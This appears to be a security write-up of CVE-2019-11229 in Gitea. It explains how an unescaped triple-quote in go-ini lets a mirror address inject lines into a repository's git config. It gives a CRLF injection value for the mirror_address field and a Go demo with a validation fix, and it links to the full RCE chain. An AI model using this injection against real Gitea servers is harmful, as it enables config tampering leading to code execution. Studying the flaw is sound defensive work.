Controllable git config leads to RCE (CVE-2019-11229)

Environment

http://image.lou00.top/dockerfile/CVE-2019-11229.zip

Patch

https://github.com/go-gitea/gitea/pull/6595/commits/52af826a7aa1df6ab538d881db236698cb367cd7

The patch replaces the direct write of the repository's config file with running a git command, so the address is handed to git as an argument instead of being serialised into the file by Gitea itself.

Analysis

Follow SaveToIndent (go-ini), which Gitea uses to persist the mirror settings:

func (f *File) SaveToIndent(filename, indent string) error {
	// Note: because we are truncating with os.Create,
	// it is safer to save to a temporary file location and rename after done.
	buf, err := f.writeToBuffer(indent)
	if err != nil {
		return err
	}

	// The serialised buffer is written straight to the target path.
	return ioutil.WriteFile(filename, buf.Bytes(), 0666)
}

Continue into writeToBuffer, where each value is quoted before being written:

// A value with a newline or backtick is wrapped in triple double-quotes;
// a value with an inline-comment character is wrapped in backticks.
// Nothing inside val is escaped, so a """ that is already part of val
// terminates the quoting early.
if strings.ContainsAny(val, "\n`") {
	val = `"""` + val + `"""`
} else if !f.options.IgnoreInlineComment && strings.ContainsAny(val, "#;") {
	val = "`" + val + "`"
}

If the value contains a newline it is simply wrapped in """. Because val is user-controlled (it is the mirror address) and may itself contain """, an attacker can close the quoted string early and the rest of the value is written as raw config lines. This is the injection point: the file write treats the value as trusted text, and git later parses whatever ended up in the file.

Reproduction

Click "Migrate external repository" and create a mirror repository.

Its config file lives at gitea-repositories/username/test_gitea.git/config:

[core]
	repositoryformatversion = 0
	filemode = true
	bare = true
	ignorecase = true
	precomposeunicode = true
[remote "origin"]
	url = https://github.com/Lou00/test_gitea
	fetch = +refs/*:refs/*
	mirror = true


Intercept the "update repository settings" request and change the mirror_address field to:

https%3A%2F%2Fgithub.com%2FLou00%2Ftest_gitea"""%0d%0a[core]%0d%0atest=/tmp%0d%0aa="""

Decoded, the value is the original URL, a closing """, a CRLF, a new [core] section with a test key, and a dummy key a=""" whose value absorbs the closing """ that the writer appends. The config file is now modified: the injected [core] lines appear after the url entry.

Clicking "Update repository settings" again reformats the file automatically, since the ini library re-parses and re-serialises it, so the injected keys end up as an ordinary section.
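The following Go program is an added example, not code from Gitea or go-ini. It copies the quoting rule from the writeToBuffer excerpt above into a small renderer, feeds it the decoded mirror_address payload from the reproduction step (constructed here from the page's URL-encoded value), and shows that a line-oriented reader such as git's config parser sees a second [core] section that the ini writer never intended to emit. It then adds the two things the vulnerable path lacked: an input check that rejects values able to break out of the quoting, and an argv builder that hands the address to git as a single argument in the spirit of the patch. The helper names, the repository path and the exact git subcommand are assumptions; nothing is executed against a real repository.

```go
package main

import (
	"bufio"
	"errors"
	"fmt"
	"strings"
)

// Payload is the page's mirror_address value with the URL-encoding removed
// (%0d%0a -> CR LF). Benign is an ordinary mirror address for comparison.
const (
	Payload = "https://github.com/Lou00/test_gitea\"\"\"\r\n[core]\r\ntest=/tmp\r\na=\"\"\""
	Benign  = "https://github.com/Lou00/test_gitea"
)

// quoteValue copies the quoting rule from go-ini's writeToBuffer quoted above:
// a value containing a newline or backtick is wrapped in """ ... """, one
// containing '#' or ';' in backticks, anything else is written as-is.
// A """ that is already inside the value is not escaped.
func quoteValue(val string) string {
	if strings.ContainsAny(val, "\n`") {
		return `"""` + val + `"""`
	} else if strings.ContainsAny(val, "#;") {
		return "`" + val + "`"
	}
	return val
}

// renderRemote writes the [remote "origin"] section the way the vulnerable
// code path did: the address goes into the url value with no validation.
func renderRemote(addr string) string {
	var b strings.Builder
	b.WriteString("[remote \"origin\"]\n")
	fmt.Fprintf(&b, "\turl = %s\n", quoteValue(addr))
	b.WriteString("\tfetch = +refs/*:refs/*\n")
	b.WriteString("\tmirror = true\n")
	return b.String()
}

// sections lists the section headers a line-oriented reader such as git's own
// config parser would see. The writer only knows about one section here, so a
// second header means the value broke out of its quotes.
func sections(cfg string) []string {
	var out []string
	sc := bufio.NewScanner(strings.NewReader(cfg))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if strings.HasPrefix(line, "[") && strings.HasSuffix(line, "]") {
			out = append(out, line)
		}
	}
	return out
}

// checkMirrorAddress is an input check of the kind the vulnerable code lacked
// (an assumption for this example, not Gitea's fix): anything that can close
// the triple quotes or start a new line must not reach the config writer.
func checkMirrorAddress(addr string) error {
	if strings.ContainsAny(addr, "\r\n") || strings.Contains(addr, `"""`) || strings.Contains(addr, "`") {
		return errors.New("mirror address contains characters that break the config format")
	}
	return nil
}

// gitRemoteSetURLArgs builds the argv for letting git rewrite the remote URL,
// the direction the patch took instead of serialising the file in Go. The
// address is one argv element, so newlines and quotes in it are handled by
// git's own escaping rather than spliced into the file. The subcommand is an
// assumption for this example and is not executed here.
func gitRemoteSetURLArgs(repoPath, addr string) []string {
	return []string{"git", "-C", repoPath, "remote", "set-url", "origin", addr}
}

func main() {
	for _, addr := range []string{Benign, Payload} {
		cfg := renderRemote(addr)
		fmt.Printf("--- address %q\n%s", addr, cfg)
		fmt.Println("sections seen by a line parser:", sections(cfg))
		if err := checkMirrorAddress(addr); err != nil {
			fmt.Println("rejected:", err)
			continue
		}
		fmt.Println("would run:", strings.Join(gitRemoteSetURLArgs("/repo.git", addr), " "))
	}
}
```

Running it prints the benign config with a single [remote "origin"] section, then the injected one in which [core] appears as a second header even though the writer emitted only one section; the check rejects the payload before it ever reaches a file or a git command.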

Exploit chain and references

https://www.lorexxar.cn/2019/07/23/gitea-cve-2019-11229/
https://www.jianshu.com/p/684fa071026a
https://www.lz1y.cn/2019/07/20/CVE-2019-11229-Gitea-RCE/